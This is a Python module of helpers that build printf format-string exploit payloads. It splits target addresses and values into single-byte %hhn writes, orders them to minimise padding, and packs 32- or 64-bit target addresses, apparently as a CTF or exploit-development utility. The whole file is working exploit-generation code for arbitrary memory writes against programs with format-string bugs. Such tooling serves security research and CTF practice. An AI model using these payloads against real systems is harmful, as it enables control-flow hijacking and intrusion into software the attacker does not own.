import struct
import re
import math

def p32(x):
    """Pack *x* as a little-endian unsigned 32-bit integer (4 bytes)."""
    return struct.pack('<L', x)


def p64(x):
    """Pack *x* as a little-endian unsigned 64-bit integer (8 bytes)."""
    return struct.pack('<Q', x)


def fmt_payload(fmt_table, off, bits):
    """Build a complete format-string payload performing every write in *fmt_table*.

    :param fmt_table: mapping of ``FmtStrExp`` instances (target address and
        value) to the number of low-order bytes of the value to write.
    :param off: printf positional-argument index passed to
        ``FmtStrExp.generate_fmt`` as its ``offset``. NOTE(review): presumably
        the ``%N$`` index of the first word of the payload buffer; confirm
        against callers.
    :param bits: 32 or 64. In 32-bit mode the packed addresses are placed
        before the format string; in 64-bit mode they are appended after it.
    :returns: the payload string.
    :raises ValueError: if *bits* is neither 32 nor 64.

    The shared ``FmtStrExp.printed`` counter is reset to 0 afterwards, even if
    building the payload fails, so a later call never starts from stale state.
    """
    # Validate up front: otherwise an unsupported width surfaces as a KeyError
    # from deep inside the helpers (the table lookup) instead of this error.
    if bits not in (32, 64):
        raise ValueError('wrong bits {}'.format(bits))

    try:
        # Order the single-byte writes so the running printed count only
        # needs small increments between them.
        total_fmt = FmtStrExp.sort_multi_target(fmt_table, bits)
        address_to_hijack = [address for address, _ in total_fmt]
        value_to_hijack = [value for _, value in total_fmt]

        fmt = FmtStrExp.generate_fmt(value_to_hijack, off, bits)
        targets = FmtStrExp.generate_target(address_to_hijack, bits)
    finally:
        # generate_fmt advances the class-level counter; always clear it.
        FmtStrExp.printed = 0

    if bits == 32:
        return targets + fmt
    return fmt + targets

class FmtStrExp(object):
    """Helpers that build printf format-string payloads writing one byte per ``%hhn``.

    ``printed`` is a class-level counter shared by every instance. It holds the
    number of characters printf is assumed to have output so far. Each
    constructor call adds its ``printed`` argument to it, and ``generate_fmt``
    advances it as it emits padding. It therefore has to be reset before an
    unrelated payload is built.
    """

    printed = 0
    # bits -> [address packer, printed bytes contributed by each packed address].
    # In 64-bit mode the addresses are put at the end of the payload (after the
    # format string), so they contribute nothing to the printed count: hence 0.
    table = {
        32: [p32, 4],
        64: [p64, 0],
    }

    def __init__(self, printed=0, hij_tar=None, hij_val=None):
        """Describe one write: store ``hij_val`` at address ``hij_tar``.

        ``printed`` is added to the shared class-level counter; it is not
        stored on the instance.
        """
        self.hijack_target = hij_tar
        self.hijack_value = hij_val
        FmtStrExp.printed += printed

    @staticmethod
    def sort_multi_target(fmt_table, bits):
        """Split every target into single-byte writes, ordered to minimise padding.

        :param fmt_table: mapping of ``FmtStrExp`` instance -> number of
            low-order bytes of its ``hijack_value`` to write. Byte ``i`` of the
            value goes to ``hijack_target + i``.
        :param bits: 32 or 64. Selects how many printed characters the packed
            addresses add in front of the format string.
        :returns: list of ``(address, byte)`` tuples sorted by the padding each
            byte needs relative to the characters already printed. The running
            count then only has to grow a little between consecutive writes.
        """
        final_fmt = []
        # .items()/range behave identically on Python 2 and also work on 3.
        for fmt, length in fmt_table.items():
            final_fmt.extend(
                (fmt.hijack_target + i, (fmt.hijack_value >> 8 * i) & 0xff)
                for i in range(length)
            )
        if not final_fmt:
            return []
        # Characters printed before the first specifier: the packed addresses
        # (non-zero only in 32-bit mode) plus the shared counter.
        base = FmtStrExp.table[bits][1] * len(final_fmt) + FmtStrExp.printed
        return sorted(final_fmt, key=lambda x: (x[1] - base) & 0xff)

    @classmethod
    def generate_target(cls, target_address, bits):
        """Return the addresses in *target_address*, packed for *bits* and concatenated."""
        payload = ''.join(cls.table[bits][0](adr) for adr in target_address)
        return payload

    @staticmethod
    def _render_fmt(pads, first_index):
        """Render ``[%<pad>c]%<index>$hhn`` pairs, numbering indices from *first_index*."""
        parts = []
        for idx, pad in enumerate(pads):
            if pad > 0:
                parts.append('%{}c'.format(pad))
            parts.append('%{}$hhn'.format(first_index + idx))
        return ''.join(parts)

    @classmethod
    def generate_fmt(cls, total_fmt, offset, bits):
        """Return the format string that writes the bytes in *total_fmt* in order.

        :param total_fmt: byte values (0-255) to write, one ``%hhn`` each.
        :param offset: positional-argument index used for the ``%N$hhn``
            specifiers. In 32-bit mode the i-th write uses ``offset + i``.
            In 64-bit mode the indices are shifted past the format string
            itself.
        :param bits: 32 or 64.
        :returns: the format string. In 64-bit mode it is NUL-padded so that
            ``cls.printed`` (as it was on entry) plus its length is a multiple
            of 8. NOTE(review): this presumably treats already-printed
            characters as a prefix in the same buffer; confirm.

        Side effect: advances the shared ``cls.printed`` counter.
        """
        # Basic setup: in 32-bit mode the packed addresses precede the format
        # string, so printf outputs them before the first specifier.
        if bits == 32:
            cls.printed += cls.table[bits][1] * len(total_fmt)

        prefix_printed = cls.printed  # used for 64-bit alignment below

        # Padding needed before each %hhn so that (characters printed) mod 256
        # equals the target byte.
        pads = []
        for byte in total_fmt:
            pad = (byte - cls.printed) % 256
            pads.append(pad)
            cls.printed += pad

        if bits != 64:
            return cls._render_fmt(pads, offset)

        # 64 bits: the addresses follow the format string. Reserve a region that
        # is a multiple of 8 bytes for prefix + format string, and point the
        # %N$hhn indices just past it. Renumbering can lengthen the indices, so
        # start from the original estimate (with slack for indices that gain a
        # digit when crossing 10). If the rendered string still does not fit
        # (e.g. indices crossing 100), grow the region and retry. Each retry
        # strictly grows `reserved`, while the string grows only
        # logarithmically, so the loop terminates.
        reserved = len(cls._render_fmt(pads, offset)) + prefix_printed
        if offset < 10:
            reserved += 10 - offset
        while True:
            reserved = (reserved + 7) // 8 * 8  # round up to a multiple of 8
            payload = cls._render_fmt(pads, offset + reserved // 8)
            if len(payload) + prefix_printed <= reserved:
                return payload.ljust(reserved - prefix_printed, '\x00')
            reserved = len(payload) + prefix_printed
